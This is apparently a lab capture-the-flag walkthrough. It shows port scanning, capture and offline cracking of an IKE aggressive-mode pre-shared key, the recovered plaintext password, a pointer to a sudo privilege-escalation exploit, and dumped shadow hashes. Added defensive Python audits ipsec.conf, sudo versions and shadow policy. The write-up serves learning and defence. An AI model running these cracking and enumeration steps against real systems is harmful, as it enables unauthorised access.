Basic information

Port scan

TCP shows only port 22 open:

$ nmap -sC -sV -Pn 10.10.11.87
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-26 13:53 JST
Nmap scan report for 10.10.11.87
Host is up (0.18s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.61 seconds

So a UDP scan is also needed, and it turns up port 500:

$ sudo nmap -sC -sV -sU -p 500 10.10.11.87
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-26 14:29 JST
Nmap scan report for 10.10.11.87
Host is up (0.42s latency).

PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.36 seconds

ISAKMP

UDP port 500 (the badge for this machine also shows 500) is ISAKMP, the VPN key-exchange service, and there is a dedicated tool for it:

First, scan to capture the pre-shared key (PSK) hash; the output also reveals that the username is ike:

sudo ike-scan -A -P 10.10.11.87

Then crack the PSK to recover the key:

sudo psk-crack psk.txt -d /usr/share/wordlists/rockyou.txt

freakingrockstarontheroad
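The reason the PSK could be recovered offline is the combination this box advertises: IKEv1 with Aggressive Mode and a pre-shared key, where the responder hands an authentication hash to any unauthenticated peer that asks. The following is an added example, not part of this writeup or of ike-scan, that audits a strongSwan-style ipsec.conf for exactly that combination. It assumes strongSwan's ipsec.conf syntax (conn sections with indented key=value lines, %default inheritance, keyexchange/aggressive/authby/leftauth keys); the sample configuration is constructed.

```python
# Added example (not from the writeup): find conns in a strongSwan-style ipsec.conf that
# negotiate IKEv1 Aggressive Mode authenticated by a pre-shared key. Such a conn gives an
# unauthenticated peer an offline-crackable hash, which is what made the PSK above recoverable.
# The config text below is constructed; the syntax assumed is strongSwan's ipsec.conf.
import re

SAMPLE_IPSEC_CONF = """\
config setup
    uniqueids=yes

conn %default
    keyexchange=ikev1
    authby=secret

conn roadwarrior-legacy
    aggressive=yes
    left=%defaultroute
    right=%any

conn site-to-site
    keyexchange=ikev2
    authby=pubkey
    left=%defaultroute
    right=203.0.113.5
"""

def parse_ipsec_conf(text):
    """Return {conn_name: {key: value}} for every conn, with 'conn %default' merged in."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()      # drop comments and trailing space
        if not line.strip():
            continue
        m = re.match(r"^(config|conn)\s+(\S+)\s*$", line)
        if m:                                      # new section header
            current = (m.group(1), m.group(2))
            sections[current] = {}
            continue
        if current and line[0].isspace() and "=" in line:
            key, value = line.strip().split("=", 1)
            sections[current][key.strip().lower()] = value.strip().lower()
    defaults = sections.get(("conn", "%default"), {})
    merged = {}
    for (kind, name), kv in sections.items():
        if kind == "conn" and name != "%default":
            merged[name] = {**defaults, **kv}      # explicit keys override %default
    return merged

def aggressive_psk_conns(text):
    """Names of conns that allow IKEv1 Aggressive Mode with PSK authentication."""
    findings = []
    for name, kv in parse_ipsec_conf(text).items():
        # keyexchange=ike (the default) still accepts IKEv1 from a peer, so treat it as IKEv1-capable
        ikev1 = kv.get("keyexchange", "ike") in ("ike", "ikev1")
        aggressive = kv.get("aggressive", "no") == "yes"
        psk = kv.get("authby") in ("secret", "psk", "xauthpsk") or kv.get("leftauth") == "psk"
        if ikev1 and aggressive and psk:
            findings.append(name)
    return findings

if __name__ == "__main__":
    for conn in aggressive_psk_conns(SAMPLE_IPSEC_CONF):
        print(f"{conn}: IKEv1 Aggressive Mode with PSK; switch to Main Mode or IKEv2 with certificates")
```

Run against a real file with `aggressive_psk_conns(open("/etc/ipsec.conf").read())`; a conn reported here should be moved to IKEv2 (or at least Main Mode) and, if a PSK must stay, given one that no wordlist contains.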

User flag

The recovered password is the SSH password of the ike user:

Privilege-escalation information

Routine enumeration with linpeas and similar tools shows sudo version 1.9.17, which has a known vulnerability:
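The check that turns a finding like this into a fleet-wide one is a version comparison, and sudo's version strings need a little care because patch releases carry a "p" suffix (1.9.17p1 sorts after 1.9.17). The following is an added example, not part of this writeup; the fixed version it compares against is a placeholder assumption to be replaced with the value from the vendor advisory, which the writeup does not name.

```python
# Added example (not from the writeup): compare an installed sudo version with the first
# fixed version from the vendor advisory. FIRST_FIXED_PLACEHOLDER is an assumption for
# illustration only; take the real threshold from the advisory for the vulnerability in question.
import re

FIRST_FIXED_PLACEHOLDER = "1.9.17p1"   # placeholder, not from the writeup

def parse_sudo_version(s):
    """'1.9.17p1' -> (1, 9, 17, 1); '1.9.17' -> (1, 9, 17, 0).  sudo marks patch releases with 'pN'."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", s.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version: {s!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))

def version_from_output(output):
    """Pull the version out of `sudo --version` output, whose first line reads 'Sudo version X'."""
    m = re.search(r"Sudo version (\S+)", output)
    if not m:
        raise ValueError("no 'Sudo version' line in output")
    return parse_sudo_version(m.group(1))

def is_vulnerable(installed, first_fixed=FIRST_FIXED_PLACEHOLDER):
    """True when the installed version sorts before the first fixed one."""
    return parse_sudo_version(installed) < parse_sudo_version(first_fixed)

if __name__ == "__main__":
    import subprocess
    out = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
    v = version_from_output(out)
    print("installed sudo", ".".join(map(str, v[:3])) + (f"p{v[3]}" if v[3] else ""),
          "VULNERABLE" if is_vulnerable(out and ".".join(map(str, v[:3])) + (f"p{v[3]}" if v[3] else "")) else "patched")
```

The version on this box, 1.9.17, compares as older than the placeholder 1.9.17p1 because the missing suffix is treated as patch level 0; a plain string comparison would get that case wrong.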

Privilege escalation & root flag

One-click exploit:

shadow

root:$y$j9T$u0cgimzO/m87OQdCkETl10$mTZSmVXBn10OJT7qVqvlEr7OwC0QppltyX33WH1esn7:20229:0:99999:7:::
ike:$y$j9T$iACv1qBHXsR1j0yqIsVwY.$udBwggnZtUPt/0TNMIhsU4TDrQm2tCzTr6xUE0ilPQ4:20292:0:99999:7:::
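Both entries above use yescrypt ($y$) and carry a maximum age of 99999 days, meaning the passwords never expire; the ike account's password is also one that appears in rockyou. The following is an added example, not part of this writeup, that parses shadow entries, names the hash scheme, converts the days-since-epoch fields into dates and flags the policy gaps a reviewer would raise. The sample lines are constructed with placeholder salts and hashes; only their field layout mirrors the entries above.

```python
# Added example (not from the writeup): audit /etc/shadow entries for weak or empty hashes and
# for passwords that never expire. Sample lines are constructed with PLACEHOLDER hash material.
from datetime import date, timedelta

EPOCH = date(1970, 1, 1)                       # shadow day counts start here

HASH_SCHEMES = {"$y$": "yescrypt", "$7$": "scrypt", "$6$": "sha512crypt",
                "$5$": "sha256crypt", "$2b$": "bcrypt", "$1$": "md5crypt"}

SAMPLE_SHADOW = """\
root:$y$j9T$PLACEHOLDERSALT$PLACEHOLDERHASH:20229:0:99999:7:::
ike:$y$j9T$PLACEHOLDERSALT$PLACEHOLDERHASH:20292:0:99999:7:::
svc:$1$PLACEHOLD$PLACEHOLDERHASH:19000:0:90:7:::
nobody:*:19000:0:99999:7:::
"""

def hash_scheme(field):
    """Classify the password field: empty, locked (! or *), a known crypt scheme, or unknown."""
    if field == "":
        return "empty"
    if field[0] in "!*":
        return "locked"
    for prefix, name in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return name
    return "unknown"

def parse_shadow_line(line):
    """Split one shadow entry into its nine fields and convert the day counts to dates."""
    f = line.split(":")
    if len(f) != 9:
        raise ValueError(f"expected 9 fields, got {len(f)}: {line!r}")
    num = lambda v: int(v) if v else None      # empty numeric fields mean 'not set'
    day = lambda v: EPOCH + timedelta(days=int(v)) if v else None
    return {"user": f[0], "hash": f[1], "scheme": hash_scheme(f[1]),
            "last_change": day(f[2]), "min_days": num(f[3]), "max_days": num(f[4]),
            "warn_days": num(f[5]), "inactive_days": num(f[6]), "expires": day(f[7])}

def audit_shadow(text):
    """Return {user: [finding, ...]} for entries that need attention."""
    findings = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        e = parse_shadow_line(line)
        issues = []
        if e["scheme"] == "empty":
            issues.append("empty password field: login without a password")
        elif e["scheme"] in ("md5crypt", "unknown"):
            issues.append(f"weak or unknown hash scheme: {e['scheme']}")
        if e["scheme"] != "locked" and (e["max_days"] is None or e["max_days"] >= 99999):
            issues.append("password never expires (max_days=99999)")
        if issues:
            findings[e["user"]] = issues
    return findings

if __name__ == "__main__":
    for user, issues in audit_shadow(SAMPLE_SHADOW).items():
        print(user, "->", "; ".join(issues))
```

Run it on a live system with `audit_shadow(open("/etc/shadow").read())` as root. The day counts in the writeup's entries translate to a root password last changed on 2025-05-21 and an ike password last changed on 2025-07-23.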

References